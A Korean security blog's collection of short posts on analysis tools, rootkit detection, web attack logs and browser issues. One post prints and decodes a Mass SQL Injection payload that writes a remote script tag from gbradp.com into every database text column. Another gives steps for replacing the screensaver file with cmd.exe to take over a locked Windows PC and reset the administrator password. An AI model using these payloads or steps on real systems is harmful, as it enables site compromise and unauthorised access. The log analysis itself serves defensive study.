336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.
[악성코드] 악성코드를 분석할 수 있는 사이트

 

 

아래 사이트에서 악성코드를 업로드 하면 분석이 가능합니다.

 

 

http://anubis.iseclab.org/

 

 

https://www.virustotal.com/ko/

336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.
[History] BrowserHistorySpy Tool

 

 

 

 

 

BrowserHistorySpy는 SecurityXploded 사에서 개발된 툴로 이름 그대로 웹 브라우저의 히스토리를 확인할 수 있습니다.

 

 

 

 

 

다운로드 링크 : http://securityxploded.com/browser-history-spy.php

 

 

 

 

 

설치 버전 및 포터블 버전(실행파일)도 있습니다.

 

 

BrowserHistorySpy.exe

 

 

 

 

 

 

 

 

 

 

 

 


 

 

이와 비슷한 툴로 NirSoft 사의 IEHistoryView 툴이 있습니다.

 

 

 

 

 

다운로드 링크 : http://www.nirsoft.net/utils/iehv.zip

 

 

336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.


[Steganography] 무료 스테가노그래피 툴 OpenStego






스테가노그래피는 커다란 메시지 또는 의미없는 메시지 안에 비밀 메시지를 숨기기는 기법으로

보통 사진, 음악, 다량의 텍스트 등에 비밀 메시지를 숨깁니다.






다음은 얼마전 종영된 드라마 유령에서도 나왔던 툴로

윈도우 및 *NIX 계열에서 동작가능한 OpenStego 툴 입니다.






툴을 실행하면 Embed 및 Extract를 할 수 있습니다.






# 다운로드 경로 : http://sourceforge.net/projects/openstego/files/openstego/






1. 파일을 숨기는 과정

Secret_Document.txt 파일을 Cover_Image.jpg 안에 숨겨 새롭게 result.png 파일을 생성하는 화면







2. 파일을 복원하는 과정

result.png 파일을 이용하여 원본 비밀 파일을 복원하는 화면










336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

[chkrootkit] 리눅스 루트킷 탐지 프로그램




리눅스 시스템에서 루트킷을 탐지하는 프로그램은 여러가지가 있습니다.



그 중에 chkrootkit 에 대해 살펴봅니다.



check rootkit 즉, chkrootkit 은 http://www.chkrootkit.org/ 에서 확인이 가능합니다.



현재는 페이지가 막힌 상황이라서 미러 페이지를 통해 다운로드를 합니다.



Mirror Page : http://www.mirrorservice.org/sites/www.chkrootkit.org/





# 설치


1. wget http://www.mirrorservice.org/sites/www.chkrootkit.org/chkrootkit-0.49.tar.gz



2. tar xvfz chkrootkit-0.49.tar.gz



3. cd chkrootkit-0.49



4. ./chkrootkit




./chkrootkit : 일반모드로 탐지시작

./chkrootkit -x : 전문가용 모드로 탐지시작





# 참고


루트킷(rootkit) 이란?

공격자가 해킹을 성공한 후 다음번 침입을 쉽게 하기 위해서 백도어 및 트로이잔 프로그램을 설치하는 데

이러한 프로그램을 루트킷이라고 합니다.

루트킷에 포함되는 프로그램으로는 ps, ls, netstat 등과 같은 시스템 프로그램들이 있는데,

이러한 루트킷은 시스템에 원래 있었던 프로그램과 바꿔치기 되기 때문에 관리자가 시스템을 점검해도

이상 없게 보이며 공격자가 실행한 프로세스나 설치된 프로그램은 확인할 수 없습니다.

336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

[MSI] Mass SQL Injection 분석하기

작년 이만때 쯤 윈도우 IIS를 웹서버로, MSSQL을 DBMS로 사용하는 사이트에 지속적인 공격을 하였던
Mass SQL 인젝션 공격(이하 MSI)을 누구나 한번 쯤은 들어보셨으리라 생각됩니다...

물론 DBA를 전직으로 하고 계시는 한 지인은...그날의 악몽을 잊을 수 없다고 하더군요(2시간 간격으로 DB 원복 ㅋㅋ)

현재는 웹방화벽이라든지 KISA에서 제공하는 WebKnight 또는 MSSQL의 설정을 통해 어느정도 해결점을 찾았습니다.

그러나 IIS+MSSQL 과 같은 플랫폼에서만 아니라 다른 플랫폼에서도 변종 공격이 지속되고 있습니다.

처음에는 단순 declare 구문으로 시작했지만, 단순 인코딩이 되더니 현재는 HEX 인코딩되어 공격을 진행합니다.

암튼 사족은 이만, 각설하고...

변종 MSI 패턴을 확인해보기로 합니다.

- Detected Log
GET /test.asp?id=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E6762726164702E636F6D2F6E67672E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Accept-Encoding: deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: www.test.com
Connection: Close

- pattern
;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E6762726164702E636F6D2F6E67672E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--

- 1차 URL 디코딩 후
;DECLARE @S VARCHAR(4000);SET @S=CAST
(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E6762726164702E636F6D2F6E67672E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220
 AS VARCHAR(4000));EXEC(@S);--

- 2차 Hex 디코딩
;DECLARE @S VARCHAR(4000);SET @S=CAST
(0xDECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.gbradp.com/ngg.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
AS VARCHAR(4000));EXEC(@S);--

결국 http://www.gbradp.com/ngg.js의 코드가 삽입되는 패턴임을 확인할 수 있습니다.

이 밖에도 사이트에서 보면 수많은 MSI 패턴이 아직도 현존하는 경우를 많이 볼 수 있습니다.

confer.
# 1차 디코딩 방법

url.exe


url 인코딩 파일로 분석할 수 있습니다.

# 2차 디코딩 방법

http://home2.paulschou.net/tools/xlate/

perl 스크립트를 이용하여 HEX 디코딩을 할 수 있지만 편하게 웹에서 디코딩 할 수 있는 사이트입니다.



336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

[윈도우] 화면보호기를 이용한 윈도우 해킹

꽤 오래전 패스워드(?) 인가란 SF 영화를 보면서 갑자기 엉뚱한 생각이 들었습니다...^_^

보통 고객사이트내지 가정에서도 많이 화면보호기 화면을 접하게 됩니다.

컴퓨터 idle이 어느시간 지속되면 화면보호기가 걸리게되는 점을 악용하여 윈도우 해킹(?)을 시도할 수 있다고 생각됩니다.

시나리오)
PC의 주인이 자리를 비우는 시점에 화면보호기가 작동될 경우,
비록 화면보호기가 작동되면 윈도우가 잠기며 비밀번호를 다시 묻게되죠...
또한 윈도우가 잠긴 상태에서는 비밀번호를 크랙하기 전에는 로그인을 할 수 없죠...

이럴 때 사회공학적 방법을 이용한 해킹이 가능하더군요...

방법)
1. 윈도우 C:\WINDOWS\system32 경로에 logon.scr 파일이 있습니다. 바로 화면보호기 파일이죠...
2. 동일한 디렉토리에 cmd.exe 파일이 있습니다. 바로 cmd 창이죠...
3. copy cmd.exe logon.scr 을 합니다. 물론 덮어쓰기 합니다.
4. 그럼 이제 화면보호기가 걸리는 시점에 화면이 잠기지 않고 덩그라니 cmd 창이 뜨게 됩니다.
- 비밀번호 변경 작업
5. net user administrator *
6. 원하는 비밀번호로 변경합니다.

# 좀 허접한 팁이지만 *.scr 파일과 같은 윈도우 파일을 악용하여 원하는 정보를 획득할 수 있는 방법은
많다고 생각됩니다...


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

침해사고 초기대응 요점정리 문서입니다.

security-incident-questionnaire-cheat-sheet.pdf


One page...!

유비무환...!


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

[보안이슈] PPTP 터널링 웜

어느 한 블로그를 읽다가... 웜이 PPTP 터널링을 뚫어서 퍼진다고 하네염 ㅋ

악성코드가 해싱 암호화되는건 알았지만...이럴수가...^^;;

출처 ;  http://www.sis.pe.kr/2583


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.
[Web Attack] 웹공격에 대한 웹로그 분석_1

[ IIS log  및 apach log 또는 웹방화벽에서 흔히 보이는 웹공격 로그 들 ]

 

"GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1"

 # 보안 스캐닝 툴인 DFind에 의해 남은 로그로, 대표적인 포트스캐닝 툴에 의한 로그입니다.
DFind는 포트스캔, 핑체크, 취약점 스캐닝, 웹서버 FingerPrinting 및 원하는 HTML 파일이
있는지 찾아주기까지 합니다.

# 사이트에 웹방화벽을 달아놓으면 항상 중국 쪽 또는 국내에서 감염된 봇에 의한 공격로그가
꼭 몇 건 탐지됩니다. 이미 조금 Old한 툴인데도 불구하고 스캔이 계속 진행되는 건, 그만큼
아직 보안에 취약한 서버가 있다는 뜻이겠네요...

요즘은 보통 자동화된 툴이나 웜을 통해 공격을 진행합니다.

Ref.
* w00tw00t.at.ISC.SANS.DFind
  http://www.atlink.it/~conti/2006/03/04/w00tw00tatiscsansdfind-update/
* w00tw00t
  http://isc.sans.org/diary.php?storyid=900
  http://isc.sans.org/diary.php?storyid=591
* DFind
  http://class101.org

336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

[보안이슈] IE8에 존재하는 세션공유 취약점

http://www.boannews.com/media/view.asp?idx=15898&kind=0

 

인터넷 익스플로러8이 파이어폭스를 따라가려다 사고를 쳤네요...('_')

 

만약 한개의 인터넷 창이라도 띄워져 있을 경우에,

추후에 다시 창을 띄우게 되면 동일 세션으로 기존 웹서비스를 이용할 수 있습니다.

 

이러한 기능으로 말미암아 서버의 세션을 유도 및 하이재킹 할 수 있는 해킹방법이 곧 나올 듯 합니다.

 

현재 인터넷뱅킹 및 포털사이트에서는 상기와 같은 대비를 해놓지 않았네요...

(세션카피 가능함, TamperIE Control Panel로 Session ID 확인가능)

 

방법은 있습니다...-_-

1. IE7으로 다운그레이드합니다.

2. 익스플로러 창을 여신 후 Ctrl+Shift+P 를 사용해 InPrivate 모드에서 웹서핑을 합니다.

(브라우저간 세션공유 안됨, 그런데 알툴바와 같은 BHO도 내려버리니...ㅜㅜ 정작 불편합니다.)

 

----------------------------------------------------------------------------------------------

('_') 옥션을 하다가 그 창 닫고, 3시간 후에 다시 다른 창열어서 옥션 쇼핑을 했는데 그냥 접속이 되어서

가슴이 통개통개 한 1인...ㅎㄷㄷ


336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.
[정보] MSI (Mass Sql Injection)

MSI (Mass Sql Injection) Tool

Leopard in a hole - baidu에서 찾을 수 있음

+ Recent posts